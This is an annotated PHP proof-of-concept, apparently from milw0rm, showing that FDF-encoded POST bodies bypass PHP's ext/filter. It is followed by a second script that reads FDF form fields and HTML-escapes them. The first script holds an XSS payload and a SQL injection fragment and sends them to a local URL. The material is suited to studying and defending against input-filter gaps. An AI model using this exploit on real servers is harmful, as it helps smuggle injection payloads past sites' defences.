// PHP ext/filter FDF POST Filter Bypass Exploit //
////////////////////////////////////////////////////////////////////////
//
// What this script does: it packs a set of field values into an FDF
// document and POSTs that document to $url with the content type
// application/vnd.fdf, then prints whatever the target answers.
//
// Per the title, the point being demonstrated is that values delivered
// this way are not run through ext/filter on the receiving side.
// NOTE(review): presumably this only applies when the target PHP build
// has FDF support loaded -- confirm against the advisory for this issue.
//
// Reviewer notes for defenders:
//  - Do not treat a global input filter as the only control. Escape at
//    the point of use (htmlspecialchars() for HTML output, parameterised
//    queries for SQL), so a body format the filter does not cover
//    cannot carry markup or SQL fragments into a sink.
//  - Requests with "Content-Type: application/vnd.fdf" sent to endpoints
//    that never expect PDF form data are worth logging and rejecting.

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

// _POST is the array that will be sent to the url in $url.
// It is used here only as a plain container for the outgoing fields.
$_POST = array();
$_POST['var1'] = "<script>alert(/XSS/);</script>";
$_POST['var2'] = " ' UNION SELECT ";
$url = "http://127.0.0.1/info.php";

// You do not need to change anything below this

// Build the FDF document, one field per entry of $_POST.
$fdfDoc = fdf_create();
foreach ($_POST as $fieldName => $fieldValue) {
    fdf_set_value($fdfDoc, $fieldName, $fieldValue, 0);
}

// The document is serialised through a scratch file in the current
// directory, read back into memory and the file removed again.
$scratchFile = "outtest.fdf";
fdf_save($fdfDoc, $scratchFile);
fdf_close($fdfDoc);
$fdfBody = file_get_contents($scratchFile);
unlink($scratchFile);

// HTTP stream context: POST the raw FDF bytes with the FDF media type.
$httpOptions = array(
    'http' => array(
        'method'  => 'POST',
        'content' => $fdfBody,
        'header'  => 'Content-Type: application/vnd.fdf',
    ),
);
$context = stream_context_create($httpOptions);

// Errors from fopen() are suppressed; a failed open is reported below.
$stream = @fopen($url, 'rb', false, $context);
if ($stream === false) {
    die("Cannot open {$url}");
}

// Print the target's response followed by a newline.
$reply = @stream_get_contents($stream);
echo $reply, "\n";
?> # milw0rm.com [2007-03-10]
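<?php
// Read the fields of an FDF document submitted by a PDF form and print
// them as HTML.
//
// The pdf form contained several input text fields with the names
// volume, date, comment, publisher, preparer, and two checkboxes
// show_publisher and show_preparer.
//
// Security: every value read from the FDF document is supplied by the
// client. Each one is passed through htmlspecialchars() before it is
// written into the page, so markup in a field is shown as text instead
// of being interpreted by the browser. The raw values stay in
// $volume, $date, $comment, $publisher and $preparer; escape them again
// for whatever context they are used in later (HTML, SQL, shell).
// NOTE(review): htmlspecialchars() uses PHP's configured default
// charset here -- confirm it matches the encoding of the page.

// Open fdf from input string provided by the extension.
// Stop early when no FDF body was submitted or it cannot be parsed,
// instead of calling the fdf_* functions on an invalid handle.
if (!isset($HTTP_FDF_DATA)) {
    die("No FDF data received.");
}
$fdf = fdf_open_string($HTTP_FDF_DATA);
if (!$fdf) {
    die("Could not parse FDF data.");
}

$volume = fdf_get_value($fdf, "volume");
echo "The volume field has the value '<b>" . htmlspecialchars((string) $volume, ENT_QUOTES) . "</b>'<br />";

$date = fdf_get_value($fdf, "date");
echo "The date field has the value '<b>" . htmlspecialchars((string) $date, ENT_QUOTES) . "</b>'<br />";

$comment = fdf_get_value($fdf, "comment");
echo "The comment field has the value '<b>" . htmlspecialchars((string) $comment, ENT_QUOTES) . "</b>'<br />";

// The checkboxes report "On" when ticked; strict comparison avoids
// PHP's loose type juggling on a client-supplied value.
if (fdf_get_value($fdf, "show_publisher") === "On") {
    $publisher = fdf_get_value($fdf, "publisher");
    echo "The publisher field has the value '<b>" . htmlspecialchars((string) $publisher, ENT_QUOTES) . "</b>'<br />";
} else {
    echo "Publisher shall not be shown.<br />";
}

if (fdf_get_value($fdf, "show_preparer") === "On") {
    $preparer = fdf_get_value($fdf, "preparer");
    echo "The preparer field has the value '<b>" . htmlspecialchars((string) $preparer, ENT_QUOTES) . "</b>'<br />";
} else {
    echo "Preparer shall not be shown.<br />";
}

fdf_close($fdf);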